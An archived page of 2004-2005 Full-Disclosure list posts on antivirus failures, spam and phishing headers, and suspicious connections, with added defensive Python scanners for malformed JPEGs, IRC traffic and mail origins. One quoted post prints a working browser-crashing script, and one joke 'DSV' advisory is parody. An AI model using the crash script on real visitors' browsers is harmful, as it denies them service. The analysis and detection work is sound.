[Full-Disclosure] RE: Full-Disclosure Digest, Vol 4, Issue 11
Andrey,

Just to add to the concern you bring up: look at what VirusTotal also shows on detection failures. http://www.virustotal.com/flash/graficas/grafica4_en.html

Of course, for me that's job security, but nonetheless it's pitiful. And now in steps Microsoft with billions under its belt, and I'll bet the odds won't change much. That's where I get really confused. We know that costs go into the billions when networks go down due to infections. I know of no one but the parody actors for AOL who welcome infections. I'm just dumbfounded at the abilities of virus companies to battle this.

I'm finding that my preconceived label of who the virus writers are and look like is rapidly being changed. I used to envision this lad with a tattered Def Leppard shirt sitting with an old laptop in the wee early dawn finishing up his code and getting ready to test it on the old grey Pentium box in the corner. Is this the guy beating the pants off the billion-dollar companies?

I would also like to add that what you've done is very impressive. I'm reading your paper now. I could and will never be able to do such, so thanks for this well-written piece. Please tell me you're not wearing a Def Leppard t-shirt!

thank you
Randall M

If we ever forget that we're one nation under God, then we will be a nation gone under. - Ronald Reagan

Andrey so correctly acknowledged:

-- Message: 8
Date: Fri, 4 Mar 2005 15:03:10 -0600
From: Andrey Bayora [EMAIL PROTECTED]
Subject: [Full-Disclosure] Bypass of 22 Antivirus software with GDI+ bug exploit Mutations - part 2
To: full-disclosure@lists.netsys.com
Cc: bugtraq@securityfocus.com
Message-ID: [EMAIL PROTECTED]
Content-Type: text/plain; charset=ISO-8859-1

The first part is here: http://archives.neohapsis.com/archives/fulldisclosure/2004-10/0475.html

First, this post isn't about how dangerous the GDI+ bug or a malicious JPEG image is, but how good your antivirus software is.

The issue is: only 1 out of 23 tested antivirus products can detect the malicious JPEG image (6 months after the public disclosure date). Here is the link to the results, the JPEG file and my paper (GCIH practical) that describes how to create this one: http://www.hiddenbit.org/jpeg.htm

This one vendor (Symantec) that can detect it obviously does it with heuristic detection (I don't work for them and didn't send them any file; moreover, I know of cases where Symantec didn't detect a virus that other vendors did). ClamAV detected this JPEG file 4 months ago, but strangely can't detect it now. What happened?

What about the 22 antivirus vendors that miss this malicious JPEG? The pattern or problem in these JPEG files is known and still many antivirus vendors miss it; does this represent the quality of their heuristic engines? OK, we know that any antivirus software can provide 100% protection

P.S. After my first post (October 14, 2004) about this problem all antivirus vendors added detection for the demo file provided by me within a couple of hours. Sadly for me, it seems that they prefer playing cat and mouse to improving their heuristic engines.

Regards,
Andrey Bayora. CISSP, GCIH

- And so ends his thoughts

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
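A practitioner reading the thread above will want to see what a signature-independent check for this class of file looks like, since the post's complaint is that vendors detect one demo file rather than the malformed structure. The following is an added example, not code from Andrey's paper or from any vendor: it walks the JPEG marker segments the way a decoder does and flags any segment whose 16-bit length field is smaller than 2. The field counts its own two bytes, so a value of 0 or 1 underflows a `length - 2` payload computation, which is the malformed structure behind the GDI+ JPEG bug (MS04-028). The two sample files are constructed inline and carry no payload; they exist only to exercise the parser.

```python
import struct

# JPEG markers (ITU T.81). SOI/EOI and RST0..RST7/TEM carry no length field;
# every other marker is followed by a big-endian 16-bit length that counts
# itself, so any well-formed value is at least 2.
SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
STANDALONE = {0x01, *range(0xD0, 0xD8)}      # TEM, RST0..RST7


def scan_jpeg_segments(data: bytes):
    """Walk the marker segments up to SOS and return (kind, offset, note) findings."""
    findings = []
    if data[:2] != b"\xFF\xD8":
        return [("not-jpeg", 0, "missing SOI marker")]
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            findings.append(("garbage", pos, "expected 0xFF marker prefix"))
            break
        marker = data[pos + 1]
        if marker == 0xFF:                    # fill byte, legal before a marker
            pos += 1
            continue
        pos += 2
        if marker == EOI:
            break
        if marker in STANDALONE:
            continue
        if pos + 2 > len(data):
            findings.append(("truncated", pos, "marker 0x%02X has no length field" % marker))
            break
        length = struct.unpack(">H", data[pos:pos + 2])[0]
        if length < 2:
            # A decoder that computes length - 2 for the payload size underflows here.
            findings.append(("bad-length", pos - 2,
                             "marker 0x%02X declares length %d (< 2)" % (marker, length)))
            break
        pos += length                          # length includes its own two bytes
        if marker == SOS:
            break                              # entropy-coded image data follows; stop
    return findings


def is_suspicious(data: bytes) -> bool:
    """True when the structural check finds a segment length of 0 or 1."""
    return any(kind == "bad-length" for kind, _, _ in scan_jpeg_segments(data))


# Constructed samples (not real files): a minimal JPEG skeleton with one
# COM (0xFFFE) segment. GOOD declares a sane length; BAD declares length 1.
COM = b"\xFF\xFE"
GOOD_JPEG = b"\xFF\xD8" + COM + struct.pack(">H", 7) + b"hello" + b"\xFF\xD9"
BAD_JPEG = b"\xFF\xD8" + COM + struct.pack(">H", 1) + b"\x00" * 16 + b"\xFF\xD9"

if __name__ == "__main__":
    for name, blob in (("good", GOOD_JPEG), ("bad", BAD_JPEG)):
        print(name, is_suspicious(blob), scan_jpeg_segments(blob))
```

The check is cheap enough to sit in a mail gateway or an upload handler, and because it keys on the structural trigger rather than on any bytes around it, renaming the file or changing the comment payload (the "mutations" the post's subject refers to) does not evade it. A production scanner would also have to walk APPn/EXIF sub-structures and the data after SOS, but those are refinements of the same walk.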
[Full-Disclosure] Strange connection from google desktop search
The following established connection was noticed:

TCP xxx.xxx.x.xx:2869 64.233.187.104:80 ESTABLISHED 2824

Process viewer reported it to be: Googledesktop.exe

SamSpade says:

03/05/05 21:54:31 whois 64.233.187.104
I don't recognise any domain in 187.104, trying internic
whois -h whois.internic.net 187.104 ...
Whois Server Version 1.3
Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information.
No match for 187.104.
03/05/05 22:07:21 finger @ 64.233.187.104
finger @ 64.233.187.104 failed, no such host
03/05/05 22:07:47 dns 64.233.187.104
No DNS for this address (host doesn't exist)

Have I been up too long and had too much coffee, or is this strange? Or is this because I have been playing around with the bulzano2.jpg!!!

thank you
Randall M

If we ever forget that we're one nation under God, then we will be a nation gone under. - Ronald Reagan
[Full-Disclosure] Microsoft sure fire customer satisfaction
Afraid Microsoft's anti-spyware will muck up your hard drive, erasing your digital photos, music collection and work files? Don't worry, you've got a $5 rebate coming your way in this worst-case scenario--enough to buy five songs on iTunes. That is, if you read and take advantage of Microsoft's legal promise.

Read more here: http://news.zdnet.com/2100-1009_22-5590042.html

thank you
Randall M
[Full-Disclosure] [Full Disclosure] RE: this IS FUN!!!!
Jordan wrote:

[Full-Disclosure] this is fun?
Jordan Klein haplo at haplo.net
Sun Feb 20 11:12:39 EST 2005

I wouldn't call that fun. It took my system to 100% CPU usage, spawned a ton of windows, and eventually caused Firefox to crash. I guess that crash was Firefox's built-in protection mechanism against this type of DoS. :-)

I haven't tried this with popup blocking enabled, since this is my work machine, and I have to allow popups so our internal sites work. (Damn, lazy web developers...)

--
Jordan Klein ~ Beware of dragons
haplo at haplo.net ~ for you are crunchy
UNIX System Administrator ~ and go well with ketchup

- Original Message -
From: Christian evilninja at gmx.net
To: full-disclosure at lists.netsys.com
Cc: Brandy Simon brandysimon at gmail.com
Sent: Sunday, February 20, 2005 7:51 AM
Subject: Re: [Full-Disclosure] this is fun?

}}

WOW! I had fun trying to capture the source page!!!

thank you
Randall M
[Full-Disclosure] Scan for IRC
I am so sorry for interrupting the list. I'm trying to pick up IRC communications on the network. I've made some filters for Ethereal and Observer but can't seem to pick it up. I'm doing something wrong. Used the 6668-6669 ports. Any help?

thank you
Randall M
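The port filter in the post above only sees IRC when the server happens to sit on a port you guessed. 6667 is the conventional port and 6665-6669 the usual neighbours, but a bot controller can listen anywhere, so the check a practitioner wants is on the payload: IRC is line-oriented text, and the client registration handshake (NICK, USER, JOIN) and the server's three-digit numeric replies look the same on any port. The following is an added example, not part of the original post; the two flows are constructed inline and the port numbers are arbitrary. In Ethereal the equivalent is a display filter on content, such as `tcp contains "PRIVMSG"`, rather than `tcp.port == 6667`.

```python
import re

# Messages an IRC client or server sends, per RFC 1459 / RFC 2812. A line is
# "[:prefix ]COMMAND params\r\n"; numerics are three-digit replies from a server.
IRC_COMMANDS = (b"NICK", b"USER", b"PASS", b"JOIN", b"PART", b"PRIVMSG", b"NOTICE",
                b"PING", b"PONG", b"MODE", b"TOPIC", b"QUIT")
IRC_LINE = re.compile(
    rb"^(?::[^ \r\n]+ )?(?:" + b"|".join(IRC_COMMANDS) + rb"|\d{3})(?: |$)",
    re.IGNORECASE,
)

IRC_PORTS = range(6665, 6670)   # conventional range; 6667 is the default


def irc_line_count(payload: bytes) -> int:
    """Number of lines in a TCP payload that parse as IRC protocol messages."""
    return sum(1 for line in payload.split(b"\n") if IRC_LINE.match(line.rstrip(b"\r")))


def classify_flow(dst_port: int, payload: bytes, min_lines: int = 2) -> str:
    """Label a flow by content first and port second.

    'irc'           - payload carries IRC messages, whatever the port
    'irc-port-only' - standard IRC port but the payload is something else
    'other'         - neither
    """
    if irc_line_count(payload) >= min_lines:
        return "irc"
    if dst_port in IRC_PORTS:
        return "irc-port-only"
    return "other"


# Constructed sample flows (not captured traffic); port 4447 is arbitrary.
BOT_REGISTRATION = (b"NICK [XP]0123456\r\n"
                    b"USER xp 0 0 :xp\r\n"
                    b"JOIN #ctrl secretkey\r\n")
SERVER_WELCOME = (b":irc.example.net 001 bot :Welcome\r\n"
                  b":irc.example.net 005 bot CHANTYPES=# :are supported\r\n")
HTTP_ON_6667 = b"GET / HTTP/1.1\r\nHost: www.example.net\r\n\r\n"

if __name__ == "__main__":
    print(classify_flow(4447, BOT_REGISTRATION))   # irc
    print(classify_flow(4447, SERVER_WELCOME))     # irc
    print(classify_flow(6667, HTTP_ON_6667))       # irc-port-only
```

The `min_lines` threshold is there because a single line beginning with three digits is not much evidence on its own; two or more well-formed IRC lines in one segment is. Run over reassembled TCP payloads this also surfaces the reverse mismatch, a standard IRC port carrying something that is not IRC, which is worth a look in its own right.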
[Full-Disclosure] Wide spread DSV
Problem: Down Syndrome Virus (DSV)
Affected devices: Various web, internet, intranet and PC's.
Severity: DOA (Denial of Access).
Author: Ima Notserious
Warnings: Elevated
Fix: At present no available fixes.

:: Overview:
Many users have been reporting various sites to be down. This has a widespread effect and can be found across the internet and intranets. The DSV has even been reported to affect PC's and other devices.

:: Details:
Internet/Intranet: When users click on links or type in addresses, browsers hesitate then display 404 messages.
PC's: When power buttons are used to start the PC, the expected operating system fails to load with various failure messages.

:: Reason for Elevated Warnings:
The DSV was elevated due to the infection spreading to a PC. A researcher found this after visiting one of the reported down sites. After reboot of the PC, the PC failed to load. The site in question was Amazon.COM.

:: Fix:
At present researchers are conducting various tests to find out how the DSV infects, the mechanism used to spread and what if any fixes are available. It has been reported that the possible spread is through port 25. At present some service providers have begun to test this by blocking the port.

:: Work around:
Do not visit any sites on the internet or intranets. Do not turn PC's off if you have recently visited any sites on the Web.

Advisory by: WorldWideWatchers.Inc
Copyright (c) 2004 WWW.Inc
[Full-Disclosure] RE: Full-Disclosure: Interesting but suspicious possible phishing mail
Have been getting a number of these come through at work also. Of course all the users are asking me questions about these. They all have the strange words, paragraphs, and questions like this one. They really got my attention. At first I thought they were hidden messages, but not so, as the ones we receive come as text.

thank you
Randall M

|--
|Message: 4
|Date: Tue, 11 Jan 2005 02:27:55 +
|From: DAN MORRILL [EMAIL PROTECTED]
|Subject: [Full-Disclosure] Interesting but suspicious possible phishing mail
|To: full-disclosure@lists.netsys.com
|Message-ID: [EMAIL PROTECTED]
|Content-Type: text/plain; format=flowed
|
|Hi folks,
|
|Got this really interesting mail in my box today, and knowing that I haven't used that e-mail address or ordered anything on line lately, wondering if it might not be a phishing e-mail. Haven't seen anything like this before. Anyone see anything similar?
|r/
|Dan
|
|from : Gabrielle U. Philips, Jr [EMAIL PROTECTED]
|Sent : Monday, January 10, 2005 10:40 PM
|To : Gabrielle U. Philips, Jr [EMAIL PROTECTED]
|CC : [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
|Subject : Shipping Notification, Tracking Number : TCD461649887242ESB
|
|MIME-Version: 1.0
|Received: from msnmail2.uswest.net ([63.226.138.22]) by mc10-f38.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Mon, 10 Jan 2005 14:45:54 -0800
|Received: (qmail 72801 invoked by uid 0); 10 Jan 2005 22:45:55 -
|Received: from unknown (63.226.138.18) by msnmail2.uswest.net with QMQP; 10 Jan 2005 22:45:55 -
|Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
|Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
|X-Message-Info: JGTYoYF78jHm2Kmrh/becsOSGajhcE+aqhdcaXLDOFI=
|Delivered-To: [EMAIL PROTECTED]
|X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 Fuz1=4 Fuz2=4
|Return-Path: [EMAIL PROTECTED]
|X-OriginalArrivalTime: 10 Jan 2005 22:45:54.0814 (UTC) FILETIME=[24BA71E0:01C4F766]
|
|Content-Type: multipart/mixed; boundary=-mpls-cmx-12.inet.qwest.net-1105397155-56110
|
|Content-Type: text/plain
|
|This email was forwarded from your previous Qwest.net email address to your MSN email address. To discontinue email forwarding for any future emails sent to your previous Qwest.net email address, please contact MSN Customer Service.
|
|Content-Type: message/rfc822
|Content-Description: forwarded message
|Content-Transfer-Encoding: 8bit
|Content-Disposition: inline
|
|From: Gabrielle U. Philips, Jr [EMAIL PROTECTED]
|To: Gabrielle U. Philips, Jr [EMAIL PROTECTED]
|Cc: [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED], [EMAIL PROTECTED]
|Subject: Shipping Notification, Tracking Number : TCD461649887242ESB
|Sent: Monday, January 10, 2005 10:40 PM
|MIME-Version: 1.0
|Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
|Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
|X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4 Fuz1=4 Fuz2=4
|Content-Type: multipart/alternative; boundary=--Part_GRKDac7J6.oMXawOLoYO4
|
|Content-Type: text/html; format=flowed; charset=iso-8859-15
|Content-Transfer-Encoding: quoted-printable
|
|Check your status Below:
|
|cov2pa.com/track.asp?cg=1c=tc
|
|The illiterate of the 21st century will not be those who cannot read and write, but those who cannot learn, unlearn, and relearn. Alvin Toffler
|Those police officers are practicing driving between the two buildings.
|The illiterate of the 21st century will not be those who cannot read and write, but those who cannot learn, unlearn, and relearn. Alvin Toffler
|Haven't the photographers already disliked praying?
|Few things are harder to put up with than the annoyance of a good example.
|3
|When people are free to do as they please, they usually imitate each other.
|-Eric Hoffer (1902-1983)
|Have you already loved sleeping?
|
[Full-Disclosure] Microsoft AntiSpyware: Will it be free and Vulnerable
On Thu, 6 Jan 2005, James Patterson Wicks wrote:

While this was just a quick test to satisfy my curiosity about the Microsoft tool, my initial feeling is that the Microsoft AntiSpyware is worth a test deployment in the office. This beta expires in July. Hopefully the final version will be free and allow for centralized domain management. It's the least that Microsoft can do.

I don't think it's going to be free. While doing a small amount of research on the spyware community I found this text string in GianttAntiSpywareUpdater.exe:

Because your Microsoft AntiSpyware subscription has expired, needed spyware definitions could NOT be downloaded and installed. Your definitions should be updated as soon as possible to prevent spyware infections. Your Microsoft AntiSpyware Subscription has Expired

And within gcASNotice.exe:

We hope your trial went well. Unfortunately you are now no longer protected from the growing dangers of spyware, worms and trojans. Continue to keep your self protected, purchase the full version today with a full money back guarantee.

I also have been a bit curious concerning the user community and the way this type of software updates, and whether or not they can be exploited this way.

Now I would like to RANT a bit here. After picking myself up off the floor from reading this I chose to post this. The primary reason most spyware and trojans get unauthorized access to my computer is because of my blind trust in the products I use. One such product was a browser embedded in the operating system I own. To rid myself of such unauthorized accesses I had to educate myself and find software to do it. Most of them are freely developed (God Bless Them Each and Every One). Along comes a program to do this owned by the operating system and products I use. I was happy and thought, who would be better equipped to do such than the owners themselves. After all they wrote and know all the programming of it. They can surely protect it.

According to the above text scans of this product I have to pay them to defend what they allowed. It's a strange, strange world after all. I don't want to sound condescending but, if this is the case, this company's software needs some humility lessons brought to it through heavy exploitation of such software. On the other hand, if such a company would provide this as a service to me then they need a community helping hand.

thank you
Randall M
Re: [Full-Disclosure] Microsoft AntiSpyware - First Impression
KF (lists) wrote:

Message: 11
Date: Fri, 07 Jan 2005 11:19:56 -0500
From: KF (lists) [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions
To: full-disclosure@lists.netsys.com
Message-ID: [EMAIL PROTECTED]
Content-Type: text/plain; charset=windows-1252; format=flowed

Do a software update check with this thing and you get GIANTAntiSpywareMain.exe listening on port 2571 until the software is closed. Feel free to beat on and fuzz that port fellas. =]

-KF

I found this with tcpview:

GIANTAntiSpywareMain.exe:3424 TCP p4fast..com:3256 216.32.240.26:http ESTABLISHED
GIANTAntiSpywareMain.exe:3424 UDP p4fast:3255 *:*

OrgName: Savvis
OrgID: SAVVI-2
Address: 3300 Regency Parkway
City: Cary
StateProv: NC
PostalCode: 27511
Country: US
ReferralServer: rwhois://rwhois.exodus.net:4321/
NetRange: 216.32.0.0 - 216.35.255.255
CIDR: 216.32.0.0/14
NetName: SAVVIS
NetHandle: NET-216-32-0-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
NameServer: DNS01.SAVVIS.NET
NameServer: DNS02.SAVVIS.NET
NameServer: DNS03.SAVVIS.NET
NameServer: DNS04.SAVVIS.NET
Comment:
RegDate: 1998-07-30
Updated: 2004-10-07

GET / HTTP/1.1
Host: 216.32.240.26
Connection: close
User-Agent: Sam Spade 1.14

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Date: Sat, 08 Jan 2005 16:40:07 GMT
Connection: close

If you look at, for instance, the system process / BHO area and select an unknown, an option to send it to SpyNet for analysis is there. If you select this, it reports to 216.31.240.26 also.

On a funny note, under the ActiveX area it lists the Microsoft update as this:

Microsoft Windows Update Control Engine
This is an unknown ActiveX
File path: C:\WINDOWS\System32\iuengine.dll
Description: Windows Update Control Engine
Publisher: Microsoft Corporation
Last modified: Tue, 26 Aug 2003 01:19:52 GMT
Installed version: 5,4,3790,14
Download location: http://v4.windowsupdate.microsoft.com/CAB/x86/unicode/iuctl.CAB?37921.8275462963

It does look as if they jumped very quickly to launch this software!

thank you
Randall M
RE: [Full-Disclosure] FIREFOX flaws: nested array sort()
So, where do you all stand. Exploit for fame or for purpose?

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan Wever
Sent: 25 November 2004 01:05
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: [Full-Disclosure] FIREFOX flaws: nested array sort() loop Stack overflow exception

Hi all,

Same flaw works for Firefox as well as MSIE:

<HTML>
<SCRIPT>
a = new Array();
while (1) { (a = new Array(a)).sort(); }
</SCRIPT>
<SCRIPT>
a = new Array();
while (1) { (a = new Array(a)).sort(); }
</SCRIPT>
</HTML>

Added to the list: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html

I'd have loved to CC mozilla about this, but I didn't have the time to do the crash course how to write a bug report and go through all that bugzilla crap.

Cheers,
SkyLined
http://www.edup.tudelft.nl/~bjwever

Randall M
[Full-Disclosure] How the hell can we CAN SPAM??
It's just getting ridiculous, not to mention what it costs all of us in the end. And might I add it doesn't make sense. I mean, they spam selling something with no real contact but a spoofed one or a real website to reach (most of the time). I placed a web appliance at my workplace and catch an average of 52000 in 7 days. My ISP has spam filters, yet I still receive a number a day. Now I am also the return-to-sender because of email spoofing. I get about 40-50 returned-to-sender or can't-deliver emails (not to mention what my ISP catches). There is not a damn thing I can do about it.

Let's add to this the problem for legit companies who have this done to them and are placed on a blacklist. They are victims of this abuse that causes undue problems with their business affairs, and it backlashes onto their clients. I often have to help fight for some of our clients who have been victimized this way. They are not spammers, but their addresses have been spoofed and blacklisted, and now any client who uses a spam blacklist blocks their legit address and misses their business correspondence.

As for myself I am stuck with the pain of removing my email and setting up another one, and the pain of contacting all correspondents who have that one to change it to the new one, etc., etc. Or I could attempt to figure out the real senders, send abuse email out and hope someone would answer and help. Doubt that would work.

Example:

Date: Wed, 17 Nov 2004 12:12:27 +
From: Mail Delivery System [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Mail delivery failed: returning message to sender

This message was created automatically by mail delivery software (Exim).

A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address(es) failed:

[EMAIL PROTECTED]
unknown local-part byoder in domain bt.net

-- This is a copy of the message, including all the headers. --

Return-path: <[EMAIL PROTECTED]>
Received: from [217.35.209.184] (helo=insmtp22.bt.net) by insmtp01.ukcore.bt.net with esmtp (Exim 3.36 #1) id 1CUOfh-000628-00 for [EMAIL PROTECTED]; Wed, 17 Nov 2004 12:12:25 +
Received: from [211.186.238.119] (helo=therightmoment.com) by insmtp22.bt.net with smtp (Exim 3.36 #1) id 1CUOTM-00043p-00 for [EMAIL PROTECTED]; Wed, 17 Nov 2004 11:59:40 +
Received: from fidnet.com (fidnet.com.mail5.psmtp.com [64.18.5.10]) by therightmoment.com (Postfix) with ESMTP id 3097F4FF8C for <[EMAIL PROTECTED]>; Wed, 17 Nov 2004 06:09:31 -0600
Message-ID: <[EMAIL PROTECTED]>
From: Tickled B. Pulsar <[EMAIL PROTECTED]>
To: Byoder <[EMAIL PROTECTED]>
Subject: =?iso-8859-1?B?VmFyaW91cyBQaWxscywgTG93IHJhdGVzLCBtb25leWJhY2sgZ3VhcmFu?= =?iso-8859-1?B?dGVlISA=?=
Date: Wed, 17 Nov 2004 06:09:31 -0600
MIME-Version: 1.0
Content-Type: multipart/alternative; charset=iso-8859-1; boundary==_NextPart_000_0005_DDA5806C.B53BEAE9
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1081
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2479.0006

The email message that was enclosed with these headers was a complete nonsense one, full of meaningless verbiage like:

<TBODY><TR><TD bgColor=3d#99 height=3d22><DIV align=3dcenter><SPAN class=3dstyle13>Once something becomes di=
scernible, or understandable, we no longer need to repeat it=2e We can de=
stroy it=2e</SPAN></DIV></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3d0 cellPadding=3d0 width=3d100% border=3d0>
<TBODY>

We talk about the scare of government control. Someone then tell me who else has the power to step in and stop the viruses and spam. Who else has the money to back massive countermeasures to put a stop to it all. Am I just being too critical and a doom-and-gloom user?

FYI: Yes I have ensured that I'm not zombified. I then tested again by turning off my internet use for two days and still received returns for those days. I clean machines for things like this for a living. Thanks for asking.

thank you
Randall M
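Both the phishing mail Dan quoted earlier on this page and the bounce above carry a Received: chain, and the question both posts raise (who actually sent this?) is answered the same way: read the chain from the top, trust only the hops written by servers you know, and take the connecting IP recorded by the last trusted hop. Every Received: line below that point was handed to your server inside the message and cannot be verified, so the fidnet.com line at the bottom of the bounce is not evidence of anything. The following is an added example, not code from either post; the two header sets are reconstructed from the headers quoted on this page (with the archive's [EMAIL PROTECTED] redactions kept), and the trusted-domain lists are assumptions chosen for the walk-through.

```python
import re
from email import message_from_string

IPV4 = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
FROM_BY = re.compile(r"\bfrom\s+(.+?)\s+by\s+(\S+)", re.IGNORECASE)


def parse_hop(value: str):
    """Split one Received: value into its 'from' clause, the IP in it, and the 'by' host.

    Returns None for hops without a remote peer (e.g. qmail's 'invoked by uid').
    """
    value = " ".join(value.split())            # unfold continuation lines
    m = FROM_BY.search(value)
    if not m:
        return None
    from_clause, by_host = m.group(1), m.group(2).strip(";,")
    ip = IPV4.search(from_clause)
    return {"from": from_clause, "ip": ip.group(1) if ip else None, "by": by_host.lower()}


def _trusted(host: str, trusted_domains) -> bool:
    return any(host == d or host.endswith("." + d) for d in trusted_domains)


def origin_ip(raw_message: str, trusted_domains):
    """Walk Received: headers newest-first and return the connecting IP seen by
    the last hop that a trusted server wrote. Hops below it were supplied by
    the sender and cannot be verified, so they are ignored."""
    msg = message_from_string(raw_message)
    origin = None
    for value in msg.get_all("Received", []):   # first header = most recent hop
        hop = parse_hop(value)
        if hop is None:
            continue
        if not _trusted(hop["by"], trusted_domains):
            break
        if hop["ip"]:
            origin = hop["ip"]
    return origin


# Reconstructed from the bounce quoted above; the receiving side is bt.net.
BOUNCE = """\
Return-path: <[EMAIL PROTECTED]>
Received: from [217.35.209.184] (helo=insmtp22.bt.net) by insmtp01.ukcore.bt.net with esmtp (Exim 3.36 #1) id 1CUOfh-000628-00 for [EMAIL PROTECTED]; Wed, 17 Nov 2004 12:12:25 +
Received: from [211.186.238.119] (helo=therightmoment.com) by insmtp22.bt.net with smtp (Exim 3.36 #1) id 1CUOTM-00043p-00 for [EMAIL PROTECTED]; Wed, 17 Nov 2004 11:59:40 +
Received: from fidnet.com (fidnet.com.mail5.psmtp.com [64.18.5.10]) by therightmoment.com (Postfix) with ESMTP id 3097F4FF8C for <[EMAIL PROTECTED]>; Wed, 17 Nov 2004 06:09:31 -0600
From: Tickled B. Pulsar <[EMAIL PROTECTED]>
To: Byoder <[EMAIL PROTECTED]>
Subject: (encoded)

body
"""

# Reconstructed from the phishing mail quoted earlier; hotmail.com, uswest.net
# and qwest.net were the recipient's own forwarding path.
PHISH = """\
Received: from msnmail2.uswest.net ([63.226.138.22]) by mc10-f38.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Mon, 10 Jan 2005 14:45:54 -0800
Received: (qmail 72801 invoked by uid 0); 10 Jan 2005 22:45:55 -
Received: from unknown (63.226.138.18) by msnmail2.uswest.net with QMQP; 10 Jan 2005 22:45:55 -
Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -
Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -
Return-Path: [EMAIL PROTECTED]
Subject: Shipping Notification, Tracking Number : TCD461649887242ESB

Check your status Below:
"""

if __name__ == "__main__":
    print(origin_ip(BOUNCE, ["bt.net"]))                                  # 211.186.238.119
    print(origin_ip(PHISH, ["hotmail.com", "uswest.net", "qwest.net"]))   # 200.42.171.64
```

For the bounce this stops at the therightmoment.com hop and reports 211.186.238.119, the address that actually connected to bt.net's MX; for the phishing mail it walks through the forwarding path down to the Qwest edge and reports 200.42.171.64, a Chilean ADSL address. That IP, not the From: line, is what an abuse report should cite, and it is also the reason Randall's forged From: address cannot be traced back to him.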
[Full-Disclosure] Securing My Mobile users
I'm attempting to find some simple free programs that will help secure my mobile users. Simple because anything above sitting in the tray will confuse them. I'm testing this on a computer that is XP SP2 patched, with McAfee 8.0 (which has file-creation type protection), Google blocker, Spybot and the Prevx protection system program.

A little program called pcAudit, which claims to act like a hacker intervention, has you do a few things, then sends the information to their server and creates a report for you to view. The report shows what you typed in the browser or program you used, shows what's in your documents folder, and takes a snapshot of your desktop.

The settings I ended with were to prevent creation of .dll files in the system and system32 folders, and to prevent unwanted programs, key loggers, etc., in McAfee. I did not do anything with the XP firewall and kept Prevx at defaults. Each time, pcAudit could show the same results even if the .dll was prevented from being created. It still gave the snapshots, the documents folder and reported what I typed.

What I'm seeing here is that the simplest settings that can be allowed have no protection. The mobile salesperson can't and refuses to be bothered with any more than this. If this simple program could do that, my users are doomed if they clicked on a link and a more malicious program was loaded.

Has anyone here examined this pcAudit program? Can they explain what makes it tick?

thank you
Randall M
[Full-Disclosure] RE: Norton AntiVirus Script Blocking Exploit -- Symantec's response
Daniel,

Man, that was just awesome! Enjoyed the movie and the popcorn! Like to see more PoC like that!!

thank you
Randall M
RE: [Full-Disclosure] Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Code)
Daniel told me:

--__--__--
Message: 4
Date: Wed, 03 Nov 2004 20:09:02 -0500
From: Daniel Milisic [EMAIL PROTECTED]
To: [EMAIL PROTECTED], [EMAIL PROTECTED]
Subject: [Full-Disclosure] Norton AntiVirus 2004/2005 Scripting Vulnerability Pt.3 (Includes PoC VBScript Code)

Hi All,

I have major issues with the quality of Norton AntiVirus. For some history, see:

http://seclists.org/lists/fulldisclosure/2004/Oct/0540.html - Norton AntiVirus 2004 Script Blocking Failure (Rant and PoC enclosed)
http://seclists.org/lists/fulldisclosure/2004/Oct/0775.html - Norton AntiVirus 2004/2005 Script Blocking Redux

Symantec's Response to this issue: (From a week ago)

ScriptBlocking is intended to provide proactive detection against script-based worms and this component of Norton AntiVirus has been effective at doing this since its introduction in 2001

Huh?

Below is a 'typical' script-based virus that Norton AntiVirus will allow a user to run, without *any* intervention on NAV's part whatsoever. It's likely that code similar to this is already appended to script-based threats/worms to assist their penetration in the wild.
--__--__--

Damn. McAfee picked it right up as viral.

thank you
Randall M
[Full-Disclosure] Gmail fixed
6. Google blocks Gmail exploit
By: John Leyden, The Register

Google has fixed a flaw in its high-profile webmail service, Gmail, which created a possible route for hackers to gain full access to a user's email account simply by knowing their user name.

http://www.securityfocus.com/news/9843

P.S. Anyone else on this list been a victim of email spoofing lately? An old account (non default) of mine is being used and I'm receiving about 20-30 returned emails (and I mean spoofed email headers).

thank you
Randall M
RE: [Full-Disclosure] Help, possible rootkit
Billy said:

--__--__--
Message: 1
From: BillyBob [EMAIL PROTECTED]
To: Full Disclosure [EMAIL PROTECTED]
Date: Sat, 23 Oct 2004 13:05:29 -0300
